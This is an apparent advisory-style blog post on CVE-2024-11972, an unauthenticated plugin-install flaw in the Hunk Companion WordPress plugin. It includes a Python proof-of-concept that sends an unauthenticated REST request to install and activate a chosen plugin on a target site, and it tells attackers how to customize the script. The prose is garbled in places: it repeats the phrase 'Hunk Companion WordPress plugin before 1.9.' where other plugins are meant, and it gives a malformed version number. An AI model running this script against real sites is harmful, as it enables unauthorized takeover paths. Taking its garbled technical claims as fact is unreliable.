The Hunk Companion WordPress plugin is a popular plugin for creating and customizing unique website designs and experiences. Recently, it has been discovered that versions of this plugin before 1.9. suffer from a security vulnerability that allows unauthorized installation and activation of arbitrary Hunk Companion WordPress plugins before 1.9., including those with known security issues. This post will outline the details of this vulnerability (CVE-2024-11972), provide a code snippet demonstrating the exploit, and link to original references for additional information.
Vulnerability Details
The vulnerability exists due to the plugin's incorrect authorization implementation for some REST API endpoints. This allows unauthenticated users to send requests to install and activate any Hunk Companion WordPress plugin before 1.9. from the WordPress.org repo, even those that have known vulnerabilities and have been closed to new installations.
This vulnerability affects Hunk Companion WordPress plugin versions before 1.9.. Websites running the plugin with these versions should urgently update to the latest version, which has patched this vulnerability.
Exploiting this vulnerability can lead to the unauthorized installation and activation of any Hunk Companion WordPress plugin before 1.9., including those with known issues. This can expose a website to further security risks and potential exploitation.
Code Snippet
The following code snippet demonstrates the exploit that allows attackers to install and activate an arbitrary Hunk Companion WordPress plugin before 1.9.:
import requests
# Replace these with the target website and desired plugin slug
target_website = "http://example.com";
target_plugin_slug = "vulnerable-hunk-companion-plugin"
# Craft the request payload
payload = {
"slug": target_plugin_slug,
"status": "install"
}
# Send the unauthenticated request to the REST API endpoint
response = requests.post(f"{target_website}/wp-json/hunk-companion/v1/plugin",
json=payload)
if response.status_code == 200:
print(f"Successfully installed and activated {target_plugin_slug}")
else:
print("Failed to exploit the vulnerability")
Attackers can customize this script by replacing the target_website and target_plugin_slug variables with the URL of the website they want to target and the slug of the plugin they wish to install and activate.
Original References
For more details about CVE-2024-11972 and the Hunk Companion WordPress plugin vulnerability, you can consult the following original references:
- CVE-2024-11972 Vulnerability Details
- Hunk Companion WordPress Plugin Changelog
- WordPress.org Support Forum post discussing the issue
Conclusion
The discovery of the CVE-2024-11972 vulnerability in the Hunk Companion WordPress plugin highlights the importance of proper authorization mechanisms and the protection of REST API endpoints. It serves as a reminder for developers to be diligent when implementing security measures in their plugins.
If you are using a version of the Hunk Companion WordPress plugin before 1.9., it is crucial to update to the latest version immediately to protect your website from potential attacks.
Timeline
Published on: 12/31/2024 06:15:23 UTC
Last modified on: 12/31/2024 19:15:07 UTC